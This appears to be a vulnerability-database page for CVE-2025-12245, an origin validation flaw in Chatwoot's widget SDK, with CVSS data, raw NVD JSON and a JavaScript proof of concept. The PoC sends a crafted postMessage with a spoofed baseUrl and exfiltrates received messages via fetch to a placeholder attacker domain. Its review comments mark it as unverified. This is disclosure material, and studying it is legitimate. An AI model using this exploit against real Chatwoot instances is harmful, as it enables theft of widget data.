Security Vulnerability Report
CVE-2025-12245 CVSS 5.3 MEDIUM

CVE-2025-12245

Published: 2025-10-27 08:15:37
Last Modified: 2025-10-28 02:15:11

Description

A vulnerability was identified in chatwoot up to 4.7.0. This vulnerability affects the function initPostMessageCommunication of the file app/javascript/sdk/IFrameHelper.js of the component Widget. The manipulation of the argument baseUrl leads to origin validation error. Remote exploitation of the attack is possible. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:chatwoot:chatwoot:*:*:*:*:*:*:*:* - VULNERABLE
Chatwoot <= 4.7.0 (the NVD configuration below uses versionEndIncluding 4.7.0, i.e. 4.7.0 itself is affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-12245 PoC - Origin Validation Error in Chatwoot Widget
// This PoC demonstrates how an attacker can exploit the origin validation error
// in Chatwoot's IFrameHelper.js initPostMessageCommunication function
//
// NOTE(review): this listing is a third-party illustration of the reported weakness
// class (origin validation on window.postMessage, CWE-345/CWE-346 per the NVD record).
// The vulnerable SDK code itself (initPostMessageCommunication in
// app/javascript/sdk/IFrameHelper.js) is not on this page, so whether the SDK
// actually accepts a parent-originated 'loaded' / 'set-user' message and how it
// uses payload.baseUrl cannot be confirmed from here — verify against the SDK source.

// Both values below are placeholders; nothing on this page ties them to a real host.
const ATTACKER_DOMAIN = 'https://attacker-controlled-site.com';
const TARGET_CHATWOOT_URL = 'https://vulnerable-chatwoot-instance.com';

// Malicious payload to exploit origin validation error
function exploitOriginValidation() {
  // NOTE(review): the frame is pointed at '/widget.js', a script URL rather than a
  // widget document; whether that frame ever runs the SDK's message handler is not
  // shown here — TODO confirm before treating this as a working reproduction.
  const iframe = document.createElement('iframe');
  iframe.src = TARGET_CHATWOOT_URL + '/widget.js';
  iframe.id = 'chatwoot-iframe';
  document.body.appendChild(iframe);

  // Wait for iframe to load
  iframe.onload = function() {
    // Craft malicious postMessage with manipulated baseUrl
    const maliciousMessage = {
      event: 'loaded',
      payload: {
        // Manipulated baseUrl to bypass origin check
        baseUrl: ATTACKER_DOMAIN,
        websiteToken: 'YOUR_WEBSITE_TOKEN', // placeholder, not a real token
        locale: 'en',
        position: 'right',
        hideMessageBubble: false,
        setUserEnabled: true
      }
    };

    // Send malicious message to iframe
    // A '*' targetOrigin delivers the message whatever origin the frame ended up on;
    // a defensive sender would name the expected widget origin instead.
    iframe.contentWindow.postMessage(maliciousMessage, '*');

    // Listen for response (potential data exfiltration)
    // This listener performs no event.origin check of its own, so any window able to
    // post to this page can trigger the logging and the outbound request below.
    window.addEventListener('message', function(event) {
      // Check if response contains sensitive data
      if (event.data && event.data.event) {
        console.log('Received response:', event.data);
        // Exfiltrate data to attacker server
        // Observable side effect: a GET to a non-widget origin with the whole received
        // message base64-encoded in the 'data' query parameter.
        fetch(ATTACKER_DOMAIN + '/log?data=' + btoa(JSON.stringify(event.data)));
      }
    });
  };
}

// Execute exploit
document.addEventListener('DOMContentLoaded', exploitOriginValidation);

// Alternative: Direct exploitation without iframe
// Defined only; nothing in this listing ever calls directExploit().
function directExploit() {
  // Inject malicious baseUrl directly
  // The '[email protected]' literals are page-extraction artifacts (obfuscated e-mail
  // addresses), preserved as-is.
  const exploitPayload = {
    event: 'set-user',
    payload: {
      identifier: '[email protected]',
      name: 'Attacker',
      email: '[email protected]',
      baseUrl: ATTACKER_DOMAIN // Manipulated origin
    }
  };
  // Posted to the parent window (not an iframe), again with a '*' targetOrigin.
  window.parent.postMessage(exploitPayload, '*');

  // Receive and log any returned sensitive data
  // Same pattern as above: no origin check on the inbound message.
  window.addEventListener('message', function(e) {
    console.log('Data leak:', e.data);
  });
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12245", "sourceIdentifier": "[email protected]", "published": "2025-10-27T08:15:36.950", "lastModified": "2025-10-28T02:15:11.223", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in chatwoot up to 4.7.0. This vulnerability affects the function initPostMessageCommunication of the file app/javascript/sdk/IFrameHelper.js of the component Widget. The manipulation of the argument baseUrl leads to origin validation error. Remote exploitation of the attack is possible. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": 
"NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-345"}, {"lang": "en", "value": "CWE-346"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:a:chatwoot:chatwoot:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.7.0", "matchCriteriaId": "64647564-7997-4E77-AE41-FA0698414129"}]}]}], "references": [{"url": "https://hckwr.com/blog/multiple-vulnerabilities-in-chatwoot/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.329916", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.329916", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.673800", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}